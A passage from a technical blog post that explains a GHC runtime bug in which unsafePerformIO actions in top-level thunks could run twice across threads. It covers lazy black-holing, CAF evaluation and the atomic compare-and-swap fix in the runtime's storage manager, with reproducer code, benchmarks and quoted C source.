class="sourceCode haskell"><span class="kw">import</span> <span class="dt">Control.Concurrent</span><br /><span class="kw">import</span> <span class="dt">Control.Monad</span><br /><span class="kw">import</span> <span class="dt">System.IO.Unsafe</span><br /><br /><span class="ot">ioThunk </span><span class="ot">::</span> ()<br />ioThunk <span class="fu">=</span> unsafePerformIO <span class="fu">$</span> <span class="kw">do</span><br /> me <span class="ot">&lt;-</span> myThreadId<br /> <span class="fu">putStrLn</span> (<span class="st">&quot;IO executed by &quot;</span> <span class="fu">++</span> <span class="fu">show</span> me)<br /><span class="ot">{-# NOINLINE ioThunk #-}</span><br /><br /><span class="ot">main </span><span class="ot">::</span> <span class="dt">IO</span> ()<br />main <span class="fu">=</span> <span class="kw">do</span><br /> replicateM_ <span class="dv">100</span> (forkIO (<span class="fu">print</span> ioThunk))<br /> threadDelay <span class="dv">10000</span> <span class="co">-- wait for other threads</span></code></pre><p>Let's test this, following the <a href="http://lambda.haskell.org/hp-tmp/docs/2011.2.0.0/ghc-doc/libraries/base-4.3.1.0/System-IO-Unsafe.html#v:unsafePerformIO">compiler flag recommendations</a> for <code>unsafePerformIO</code>.</p><pre><code><span class="Prompt">$</span> <span class="Entry">ghc -V</span><br />The Glorious Glasgow Haskell Compilation System, version 7.2.1<br /><br /><span class="Prompt">$</span> <span class="Entry">ghc -rtsopts -threaded -fno-cse -fno-full-laziness dupe.hs</span><br />[1 of 1] Compiling Main ( dupe.hs, dupe.o )<br />Linking dupe ...<br /><br /><span class="Prompt">$</span> <span class="Entry">while true; do ./dupe +RTS -N | head -n 2; echo ----; done</span><br /></code></pre><p>Within a few seconds I see output like this:</p><pre><code>----<br />IO executed by ThreadId 35<br />()<br />----<br />IO executed by ThreadId 78<br />IO executed by ThreadId 85<br />----<br />IO executed by ThreadId 48<br />()<br />----<br /></code></pre><p>In the middle run, two threads executed the IO action.</p><p>This bug was <a href="http://hackage.haskell.org/trac/ghc/ticket/5558">reported</a> two weeks ago and is already <a href="http://hackage.haskell.org/trac/ghc/changeset/96c80d34163fd422cbc18f4532b7556212a554b8">fixed</a> in GHC HEAD. I tested with GHC 7.3.20111026, aka <code>g6f5b798</code>, and the problem seemed to go away.</p><p>Unfortunately it will be some time before GHC 7.4 is widely deployed, so I'm thinking about workarounds for my original global locking problem. I'll probably store the lock in a C global variable via <a href="http://lambda.haskell.org/hp-tmp/docs/2011.2.0.0/ghc-doc/libraries/haskell2010-1.0.0.0/Foreign-StablePtr.html"><code>StablePtr</code></a>, or failing that, implement all locking in C. But I'd appreciate any other suggestions.</p><p>The remainder of this article is an attempt to explain this GHC bug, and the fix committed by Simon Marlow. It's long because</p><ul class="incremental"><li><p>I try not to assume you know anything about how GHC works. I don't know very much, myself.</p></li><li><p>There are various digressions.</p></li></ul><h1 id="objects-at-runtime">Objects at runtime</h1><p>Code produced by GHC can allocate <a href="http://hackage.haskell.org/trac/ghc/wiki/Commentary/Rts/Storage/HeapObjects#Typesofobject">many kinds of objects</a>. Here are just a few:</p><ul class="incremental"><li><p><a href="http://hackage.haskell.org/trac/ghc/wiki/Commentary/Rts/Storage/HeapObjects#DataConstructors"><strong><code>CONSTR</code></strong></a> objects represent algebraic data constructors and their associated fields. The value <code>(Just 'x')</code> would be represented by a <code>CONSTR</code> object, holding a pointer to another object representing <code>'x'</code>.</p></li><li><p><a href="http://hackage.haskell.org/trac/ghc/wiki/Commentary/Rts/Storage/HeapObjects#FunctionClosures"><strong><code>FUN</code></strong></a> objects represent functions, like the value <code>(\x -&gt; x+1)</code>.</p></li><li><p><a href="http://hackage.haskell.org/trac/ghc/wiki/Commentary/Rts/Storage/HeapObjects#Thunks"><strong><code>THUNK</code></strong></a> objects represent computations which have not yet happened. Suppose we write:</p><pre class="sourceCode"><code class="sourceCode haskell"><span class="kw">let</span> x <span class="fu">=</span> <span class="dv">2</span> <span class="fu">+</span> <span class="dv">2</span> <span class="kw">in</span> f x x</code></pre><p>This code will construct a <code>THUNK</code> object for <code>x</code> and pass it to the code for <code>f</code>. Some time later, <code>f</code> may force evaluation of its argument, and the thunk will, in turn, invoke <code>(+)</code>. When the thunk has finished evaluating, it is overwritten with the evaluation result. (Here, this might be an <a href="http://lambda.haskell.org/hp-tmp/docs/2011.2.0.0/ghc-doc/libraries/ghc-prim-0.2.0.0/GHC-Types.html#t:Int"><code>I#</code></a> <code>CONSTR</code> holding the number 4.) If <code>f</code> then forces its second argument, which is <em>also</em> <code>x</code>, the work done by <code>(+)</code> is not repeated. This is the essence of lazy evaluation.</p></li><li><p>When a thunk is forced, it's first overwritten with a <strong><code>BLACKHOLE</code></strong> object. This <code>BLACKHOLE</code> is eventually replaced with the evaluation result. Therefore a <code>BLACKHOLE</code> represents a thunk which is currently being evaluated.</p><p>Identifying this case helps the garbage collector, and it also gives GHC its seemingly magical ability to detect some infinite loops. Forcing a <code>BLACKHOLE</code> indicates a computation which cannot proceed until the same computation has finished. The GHC runtime will terminate the program with a <code>&lt;&lt;loop&gt;&gt;</code> exception.</p></li><li><p>We can't truly update thunks in place, because the evaluation result might be larger than the space originally allocated for the thunk. So we write an indirection pointing to the evaluation result. These <a href="http://hackage.haskell.org/trac/ghc/wiki/Commentary/Rts/Storage/HeapObjects#Indirections"><strong><code>IND</code></strong></a> objects will later be removed by the garbage collector.</p></li></ul><h1 id="static-objects">Static objects</h1><p>Dynamically-allocated objects make sense for values which are created as your program runs. But the top-level declarations in a Haskell module don't need to be dynamically allocated; they already exist when your program starts up. GHC allocates these <a href="http://hackage.haskell.org/trac/ghc/wiki/Commentary/Rts/Storage/HeapObjects#Staticobjects">static objects</a> in your executable's data section, the same place where C global variables live.</p><p>Consider this program:</p><pre class="sourceCode"><code class="sourceCode haskell">x <span class="fu">=</span> <span class="kw">Just</span> <span class="ch">'x'</span><br /><br />f (<span class="kw">Just</span> _) <span class="fu">=</span> \y <span class="ot">-&gt;</span> y<span class="fu">+</span><span class="dv">1</span><br /><br />main <span class="fu">=</span> <span class="fu">print</span> (f x <span class="dv">3</span>)</code></pre><p>Ignoring optimizations, GHC will produce code where:</p><ul class="incremental"><li><p><code>x</code> is a <code>CONSTR_STATIC</code> object.</p></li><li><p><code>f</code> is a <code>FUN_STATIC</code> object. When called, <code>f</code> will return a dynamically-allocated <code>FUN</code> object representing <code>(\y -&gt; y+1)</code>.</p></li><li><p><code>main</code> is a <code>THUNK_STATIC</code> object. It represents the unevaluated expression formed by applying the function <code>print</code> to the argument <code>(f x 3)</code>. A static thunk is also known as a <a href="http://www.haskell.org/haskellwiki/Constant_applicative_form">constant applicative form</a>, or a CAF for short. Like any other thunk, a CAF may or may not get evaluated. If evaluated, it will be replaced with a black hole and eventually the evaluation result. In this example, <code>main</code> will be evaluated by the runtime system, in deciding what IO to perform.</p></li></ul><h1 id="black-holes-and-revelations">Black holes and revelations</h1><p>That's all fine for a single-threaded Haskell runtime, but GHC supports running many Haskell threads across multiple OS threads. This introduces some additional complications. For example, one thread might force a thunk which is currently being evaluated by another thread. The thread will find a <code>BLACKHOLE</code>, but terminating the program would be incorrect. Instead the <code>BLACKHOLE</code> puts the current Haskell thread to sleep, and wakes it up when the evaluation result is ready.</p><p>If two threads force the same thunk at the same time, they will both perform the deferred computation. We could avoid this wasted effort by writing and checking for black holes using expensive atomic memory operations. But this is a poor tradeoff; we slow down <em>every</em> evaluation in order to prevent a rare race condition.</p><p>As a compiler for a language with pure evaluation, GHC has the luxury of tolerating some duplicated computation. Evaluating an expression twice can't change a program's behavior. And most thunks are cheap to evaluate, hardly worth the effort of avoiding duplication. So GHC follows a &quot;lazy black-holing&quot; strategy.<sup><a href="#x1fn1" class="footnoteRef" id="x1fnref1">1</a></sup><sup><a href="#x1fn2" class="footnoteRef" id="x1fnref2">2</a></sup> Threads write black holes only when they enter the garbage collector. If a thread discovers that one of its thunks has already been claimed, it will abandon the duplicated work-in-progress. This scheme avoids large wasted computations without paying the price on small computations. You can find the gritty details within the function <a href="http://hackage.haskell.org/trac/ghc/browser/rts/ThreadPaused.c?rev=96c80d34163fd422cbc18f4532b7556212a554b8#L171"><code>threadPaused</code></a>, in <code>rts/ThreadPaused.c</code>.</p><h1 id="unsafedupableperformio"><code>unsafe[Dupable]PerformIO</code></h1><p>You may remember that we started, all those many words ago, with a program that uses <code>unsafePerformIO</code>. This breaks the pure-evaluation property of Haskell. Repeated evaluation will affect semantics! Might lazy black-holing be the culprit in the original bug?</p><p>Naturally, the GHC developers thought about this case. Here's the <a href="http://hackage.haskell.org/packages/archive/base/4.4.0.0/doc/html/src/GHC-IO.html#unsafePerformIO">implementation of <code>unsafePerformIO</code></a>:</p><pre class="sourceCode"><code class="sourceCode haskell">unsafePerformIO m <span class="fu">=</span> unsafeDupablePerformIO (noDuplicate <span class="fu">&gt;&gt;</span> m)<br /><br />noDuplicate <span class="fu">=</span> <span class="dt">IO</span> <span class="fu">$</span> \s <span class="ot">-&gt;</span> <span class="kw">case</span> noDuplicate# s <span class="kw">of</span> s' <span class="ot">-&gt;</span> (# s', () #)<br /><br />unsafeDupablePerformIO (<span class="dt">IO</span> m) <span class="fu">=</span> lazy (<span class="kw">case</span> m realWorld# <span class="kw">of</span> (# _, r #) <span class="ot">-&gt;</span> r)</code></pre><p>The core behavior is implemented by <a href="http://hackage.haskell.org/packages/archive/base/4.4.0.0/doc/html/src/GHC-IO.html#unsafeDupablePerformIO"><code>unsafeDupablePerformIO</code></a>, using GHC's internal representation of IO actions (which is beyond the scope of this article, to the extent I even have a scope in mind). As the name suggests, <code>unsafeDupablePerformIO</code> provides no guarantee against duplicate execution. The more familiar <code>unsafePerformIO</code> builds this guarantee by first invoking the <code>noDuplicate#</code> primitive operation.</p><p>The <a href="http://hackage.haskell.org/trac/ghc/browser/rts/PrimOps.cmm?rev=96c80d34163fd422cbc18f4532b7556212a554b8#L1904">implementation of <code>noDuplicate#</code></a>, written in GHC's <a href="http://hackage.haskell.org/trac/ghc/wiki/Commentary/Compiler/CmmType"><code>Cmm</code></a> intermediate language, handles a few tricky considerations. But it's basically a call to the function <code>threadPaused</code>, which we saw is responsible for lazy black-holing. In other words, thunks built from <code>unsafePerformIO</code> perform eager black-holing.</p><p>Since <code>threadPaused</code> has to walk the evaluation stack, <code>unsafeDupablePerformIO</code> might be much faster than <code>unsafePerformIO</code>. In practice, this will matter when performing a great number of very quick IO actions, like <a href="http://lambda.haskell.org/hp-tmp/docs/2011.2.0.0/ghc-doc/libraries/haskell2010-1.0.0.0/Foreign-Storable.html#v:peek"><code>peek</code></a>ing a single byte from memory. In this case it is safe to duplicate IO, provided the buffer is unchanging. Let's measure the performance difference.</p><pre class="sourceCode"><code class="sourceCode haskell"><span class="kw">import</span> <span class="dt">GHC.IO</span><br /><span class="kw">import</span> <span class="dt">Foreign</span> <span class="kw">hiding</span> (unsafePerformIO)<br /><span class="kw">import</span> <span class="dt">System.Random</span><br /><span class="kw">import</span> <span class="dt">Criterion.Main</span><br /><br />main <span class="fu">=</span> <span class="kw">do</span><br /> <span class="kw">let</span> sz <span class="fu">=</span> <span class="dv">1024</span><span class="fu">*</span><span class="dv">1024</span><br /> buf <span class="ot">&lt;-</span> mallocBytes sz<br /> <span class="kw">let</span> get i <span class="fu">=</span> peekByteOff buf<span class="ot"> i </span><span class="ot">::</span> <span class="dt">IO</span> <span class="dt">Word8</span><br /> peek_d i <span class="fu">=</span> unsafeDupablePerformIO (get i)<br /> peek_n i <span class="fu">=</span> unsafePerformIO (get i)<br /> idxes <span class="fu">=</span> <span class="fu">take</span> <span class="dv">1024</span> <span class="fu">$</span> randomRs (<span class="dv">0</span>, sz<span class="fu">-</span><span class="dv">1</span>) (mkStdGen <span class="dv">49</span>)<br /> evaluate (<span class="fu">sum</span> idxes) <span class="co">-- force idxes ahead of time</span><br /> defaultMain<br /> [ bench <span class="st">&quot;dup&quot;</span> <span class="fu">$</span> nf (<span class="fu">map</span> peek_d) idxes<br /> , bench <span class="st">&quot;noDup&quot;</span> <span class="fu">$</span> nf (<span class="fu">map</span> peek_n) idxes ]</code></pre><p>And the results:</p><pre><code><span class="Prompt">$</span> <span class="Entry">ghc -rtsopts -threaded -O2 peek.hs &amp;&amp; ./peek +RTS -N</span><br />...<br /><br />benchmarking dup<br />mean: 76.42962 us, lb 75.11134 us, ub 78.18593 us, ci 0.950<br />std dev: 7.764123 us, lb 6.300310 us, ub 9.790345 us, ci 0.950<br /><br />benchmarking noDup<br />mean: 142.1720 us, lb 139.7312 us, ub 145.4300 us, ci 0.950<br />std dev: 14.43673 us, lb 11.40254 us, ub 17.86663 us, ci 0.950<br /></code></pre><p>So performance-critical <a href="http://en.wikipedia.org/wiki/Idempotence">idempotent</a> actions can benefit from <code>unsafeDupablePerformIO</code>. But most code should use the safer <code>unsafePerformIO</code>, as our bug reproducer does. And the <code>noDuplicate#</code> machinery for <code>unsafePerformIO</code> makes sense, so what's causing our bug?</p><h1 id="the-bug-finally">The bug, finally</h1><p>After all those details and diversions, let's go back to <a href="http://hackage.haskell.org/trac/ghc/changeset/96c80d34163fd422cbc18f4532b7556212a554b8">the fix</a> for <a href="http://hackage.haskell.org/trac/ghc/ticket/5558">GHC bug #5558</a>. The action is mostly in <a href="http://hackage.haskell.org/trac/ghc/changeset/96c80d34163fd422cbc18f4532b7556212a554b8/rts/sm/Storage.c"><code>rts/sm/Storage.c</code></a>. This file is part of GHC's <a href="http://hackage.haskell.org/trac/ghc/wiki/Commentary/Rts/Storage">storage manager</a>, which provides services such as garbage collection.</p><p>Recall that our problematic code looked like this:</p><pre class="sourceCode"><code class="sourceCode haskell"><span class="ot">ioThunk </span><span class="ot">::</span> ()<br />ioThunk <span class="fu">=</span> unsafePerformIO <span class="fu">$</span> <span class="kw">do</span> <span class="fu">...</span></code></pre><p>This is an application of the function <code>($)</code> to the argument <code>unsafePerformIO</code>. So it's a static thunk, a CAF. Here's the <em>old</em> description of how CAF evaluation works, <a href="http://hackage.haskell.org/trac/ghc/browser/rts/sm/Storage.c?rev=e91ed183fdde4aa4f51b96987c7fb6fa2bfd15f5#L227">from <code>Storage.c</code></a>:</p><blockquote><p>The entry code for every CAF does the following:</p><ul class="incremental"><li>builds a <code>BLACKHOLE</code> in the heap</li><li>pushes an update frame pointing to the <code>BLACKHOLE</code></li><li>calls <code>newCaf</code>, below</li><li>updates the CAF with a static indirection to the <code>BLACKHOLE</code></li></ul><p>Why do we build an <code>BLACKHOLE</code> in the heap rather than just updating the thunk directly? It's so that we only need one kind of update frame - otherwise we'd need a static version of the update frame too.</p></blockquote><p>So here's the problem. Normal thunks get blackholed <em>in place</em>, and a thread detects duplicated evaluation by noticing that one of its thunks-in-progress became a <code>BLACKHOLE</code>. But static thunks — CAFs — are blackholed <em>by indirection</em>. Two threads might perform the above procedure concurrently, producing two different heap-allocated <code>BLACKHOLE</code>s, and they'd never notice.</p><p>As Simon Marlow put it:</p><blockquote><p>Note [<em>atomic CAF entry</em>]</p><p>With <code>THREADED_RTS</code>, <code>newCaf()</code> is required to be atomic (see #5558). This is because if two threads happened to enter the same CAF simultaneously, they would create two distinct <code>CAF_BLACKHOLEs</code>, and so the normal <code>threadPaused()</code> machinery for detecting duplicate evaluation will not detect this. Hence in <code>lockCAF()</code> below, we atomically lock the CAF with <code>WHITEHOLE</code> before updating it with <code>IND_STATIC</code>, and return zero if another thread locked the CAF first. In the event that we lost the race, CAF entry code will re-enter the CAF and block on the other thread's <code>CAF_BLACKHOLE</code>.</p></blockquote><p>I can't explain precisely what a <code>WHITEHOLE</code> means, but they're used for <a href="http://en.wikipedia.org/wiki/Spinlock">spin locks</a> or wait-free synchronization in various places. For example, the <a href="http://hackage.haskell.org/trac/ghc/browser/rts/PrimOps.cmm?rev=96c80d34163fd422cbc18f4532b7556212a554b8#L1105"><code>MVar</code> primitives</a> are synchronized by the <a href="http://hackage.haskell.org/trac/ghc/browser/includes/rts/storage/SMPClosureOps.h?rev=96c80d34163fd422cbc18f4532b7556212a554b8#L26"><code>lockClosure</code></a> spinlock routine, which uses <code>WHITEHOLE</code>s.</p><h1 id="the-fix">The fix</h1><p>Here's the corrected <a href="http://hackage.haskell.org/trac/ghc/browser/rts/sm/Storage.c?rev=96c80d34163fd422cbc18f4532b7556212a554b8#L227">CAF evaluation procedure</a>:</p><blockquote><p>The entry code for every CAF does the following:</p><ul class="incremental"><li>builds a <code>CAF_BLACKHOLE</code> in the heap</li><li>calls <code>newCaf</code>, which atomically updates the CAF with <code>IND_STATIC</code> pointing to the <code>CAF_BLACKHOLE</code></li><li>if <code>newCaf</code> returns zero, it re-enters the CAF (see Note [<em>atomic CAF entry</em>])</li><li>pushes an update frame pointing to the <code>CAF_BLACKHOLE</code></li></ul></blockquote><p><code>newCAF</code> is made atomic by introducing a new helper function, <a href="http://hackage.haskell.org/trac/ghc/browser/rts/sm/Storage.c?rev=96c80d34163fd422cbc18f4532b7556212a554b8#L293"><code>lockCAF</code></a>, which is reproduced here for your viewing pleasure:</p><pre class="sourceCode"><code class="sourceCode c">STATIC_INLINE StgWord lockCAF (StgClosure *caf, StgClosure *bh)<br />{<br /> <span class="dt">const</span> StgInfoTable *orig_info;<br /><br /> orig_info = caf-&gt;header.info;<br /><br /><span class="ot">#ifdef THREADED_RTS</span><br /> <span class="dt">const</span> StgInfoTable *cur_info;<br /><br /> <span class="kw">if</span> (orig_info == &amp;stg_IND_STATIC_info ||<br /> orig_info == &amp;stg_WHITEHOLE_info) {<br /> <span class="co">// already claimed by another thread; re-enter the CAF</span><br /> <span class="kw">return</span> <span class="dv">0</span>;<br /> }<br /><br /> cur_info = (<span class="dt">const</span> StgInfoTable *)<br /> cas((StgVolatilePtr)&amp;caf-&gt;header.info,<br /> (StgWord)orig_info,<br /> (StgWord)&amp;stg_WHITEHOLE_info);<br /><br /> <span class="kw">if</span> (cur_info != orig_info) {<br /> <span class="co">// already claimed by another thread; re-enter the CAF</span><br /> <span class="kw">return</span> <span class="dv">0</span>;<br /> }<br /><br /> <span class="co">// successfully claimed by us; overwrite with IND_STATIC</span><br /><span class="ot">#endif</span><br /><br /> <span class="co">// For the benefit of revertCAFs(), save the original info pointer</span><br /> ((StgIndStatic *)caf)-&gt;saved_info = orig_info;<br /><br /> ((StgIndStatic*)caf)-&gt;indirectee = bh;<br /> write_barrier();<br /> SET_INFO(caf,&amp;stg_IND_STATIC_info);<br /><br /> <span class="kw">return</span> <span class="dv">1</span>;<br />}</code></pre><p>We grab the CAF's <a href="http://hackage.haskell.org/trac/ghc/wiki/Commentary/Rts/Storage/HeapObjects#HeapObjects">info table pointer</a>, which tells us what kind of object it is. If it's not already claimed by another thread, we write a <code>WHITEHOLE</code> — but only if the CAF hasn't changed in the meantime. This step is an atomic <a href="http://en.wikipedia.org/wiki/Compare-and-swap">compare-and-swap</a>, implemented by architecture-specific code. The function <code>cas</code> is <a href="http://hackage.haskell.org/trac/ghc/browser/includes/stg/SMP.h?rev=96c80d34163fd422cbc18f4532b7556212a554b8#L43">specified by this pseudocode</a>:</p><pre class="sourceCode"><code class="sourceCode c">cas(p,o,n) {<br /> <span class="kw">atomically</span> {<br /> r = *p;<br /> <span class="kw">if</span> (r == o) { *p = n };<br /> <span class="kw">return</span> r;<br /> }<br />}</code></pre><p>Here's the <a href="http://hackage.haskell.org/trac/ghc/browser/includes/stg/SMP.h?rev=96c80d34163fd422cbc18f4532b7556212a554b8#L165">implementation for x86</a>, using <a href="http://gcc.gnu.org/onlinedocs/gcc/Extended-Asm.html">GCC extended inline assembly</a>:</p><pre class="sourceCode"><code class="sourceCode c">EXTERN_INLINE StgWord<br />cas(StgVolatilePtr p, StgWord o, StgWord n)<br />{<br /> __asm__ __volatile__ (<br /> <span class="st">&quot;lock</span><span class="ch">\n</span><span class="st">cmpxchg %3,%1&quot;</span><br /> :<span class="st">&quot;=a&quot;</span>(o), <span class="st">&quot;=m&quot;</span> (*(<span class="dt">volatile</span> <span class="dt">unsigned</span> <span class="dt">int</span> *)p)<br /> :<span class="st">&quot;0&quot;</span> (o), <span class="st">&quot;r&quot;</span> (n));<br /> <span class="kw">return</span> o;<br />}</code></pre><p>There are some interesting variations between architectures. SPARC and x86 use single instructions, while PowerPC and ARMv6 have longer sequences. Old ARM processors require a <a href="http://hackage.haskell.org/trac/ghc/browser/rts/OldARMAtomic.c?rev=96c80d34163fd422cbc18f4532b7556212a554b8">global spinlock</a>, which sounds painful. Who's running Haskell on ARMv5 chips?</p><h1 id="deep-breath">*deep breath*</h1><p>Thanks for reading / skimming this far! I learned a lot by writing this article, and I hope you enjoyed reading it. I'm sure I said something wrong somewhere, so please do not hesitate to correct me in the comments.</p><div class="footnotes"><hr /><ol><li id="x1fn1"><p>Tim Harris, Simon Marlow, and Simon Peyton Jones. <a href="http://www.haskell.org/~simonmar/papers/multiproc.pdf">Haskell on a shared-memory multiprocessor</a>. In Haskell '05: Proceedings of the 2005 ACM SIGPLAN workshop on Haskell, pages 49–61. <a href="#x1fnref1" class="footnoteBackLink">↩</a></p></li><li id="x1fn2"><p>Simon Marlow, Simon Peyton Jones, and Satnam Singh. <a href="http://community.haskell.org/~simonmar/papers/multicore-ghc.pdf">Runtime Support for Multicore Haskell</a>. In ICFP'09. <a href="#x1fnref2" class="footnoteBackLink">↩</a></p></li></ol></div>http://mainisusuallyafunction.blogspot.com/2011/10/thunks-and-lazy-blackholes-introduction.htmlnoreply@blogger.com (keegan)8